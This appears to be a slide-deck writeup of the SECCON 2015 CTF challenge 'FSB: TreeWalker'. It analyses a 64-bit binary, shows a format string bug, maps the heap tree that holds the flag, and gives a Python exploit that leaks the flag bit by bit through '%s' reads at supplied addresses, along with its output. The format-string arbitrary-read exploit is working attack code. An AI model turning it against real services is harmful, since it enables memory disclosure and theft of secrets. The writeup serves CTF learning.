FSB: TreeWalker Exploit 200 points SECCON 2015 Online CTF Writeup

1. FSB: TreeWalker
Exploit 200 points - SECCON 2015 Online CTF
you0708@YOKARO-MON

2. treewalker.pwn.seccon.jp
20000

3. Surface Analysis
• ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
• Arch: amd64-64-little
• RELRO: No RELRO
• Stack: No canary found
• NX: NX enabled
• PIE: No PIE
• FORTIFY: Enabled

4. Dynamic Analysis
# ./treewalker
0000000000c69010
ABCDEFGHIJKLMN
vulnserver.c(77): Invalid input
# IJKLMN
bash: IJKLMN: command not found
#
Address?
Read only 8 bytesRead only 8 bytes

5. Static Analysis
• Main function
The address given by
the program is related
to flag?

6. • construct_tree
Static Analysis

7. Static Analysis
• construct_tree
Leaf
Flag = 0x49
0
Child
0 1
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x4C
0
0

8. Static Analysis
• construct_tree
0 1
Leaf
Leaf
Leaf
Leaf
Leaf
Leaf
Leaf
Leaf
0
1
0
1
0
0
0
1
F
Leaf End

9. Static Analysis
• Main function
1. First 8 bytes of input
data are “size”
2. Show input data by
___printf_chk

10. Static Analysis
0x0000000000000004 hoge
hoge
flag address
Loop

11. Vulnerability
• FSB = Format String Bug
0000000000602010
00000078
f7b175c0
00000b40
ffffcff0
00000000
00000078
cccccccc
cccccccc
cccccccc
cccccccc
cccccccc
cccccccc
cccccccc
cccccccc
78383025
After sending
“%08x” * 30
“%08x”

12. Exploit

13. Understanding Heap Layout
• Heap chunks
Chunk size + PREV_INUSE Flag = 0x49
0 or Address of child

14. Information Leakage
• Using format string bug
Leaf
Flag = 0x49
0
Child
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x49
Child
0
zero or not
0x49 or 0x4C
…
Given address
Given address
+0x18 (size of leaf)
+0x08 (size of chunk header)
Given address
+ 0x40
zero or not
0x49 or 0x4C
zero or not
0x49 or 0x4C

15. exploit.py
flag = ""
flag_next = ""
while flag_next != "L":
c = 0
for i in range(8):
c = c << 1
buf = '%08x' * 32
buf += ' !%s! '
buf += ' !%s! '
buf += pQ(addr)
buf += pQ(addr + 8)
f.write(pQ(len(buf)) + buf)
read_until(f, ' !')
flag_next = read_until(f, '! ')[:-3]
read_until(f, ' !')
child = read_until(f, '! ')[:-3]
if flag_next == 'L':
break
if child:
bit = 1
else:
bit = 0
print bit,
c += bit
addr += 0x20
else:
print ""
flag += chr(c)
print("[*] flag: %s" % flag)

16. python exploit.py
[*] addr: 0000000000602010
0 1 0 1 0 0 1 1
0 1 0 0 0 1 0 1
0 1 0 0 0 0 1 1
0 1 0 0 0 0 1 1
0 1 0 0 1 1 1 1
0 1 0 0 1 1 1 0
0 1 1 1 1 0 1 1
0 0 1 1 0 1 0 0
0 1 1 1 0 0 1 0
0 1 1 0 0 0 1 0
0 0 1 1 0 0 0 1
0 0 1 1 0 1 1 1
0 1 0 1 0 0 1 0
0 1 0 0 0 0 0 0
0 1 1 1 0 0 1 0
0 1 0 1 1 0 0 1
0 1 0 1 0 0 1 0
0 1 1 0 0 1 0 1
0 1 0 0 0 0 0 1
0 1 1 0 0 1 0 0
0 1 1 1 1 1 0 1
[*] flag: SECCON{4rb17R@rYReAd}

17. Thank you!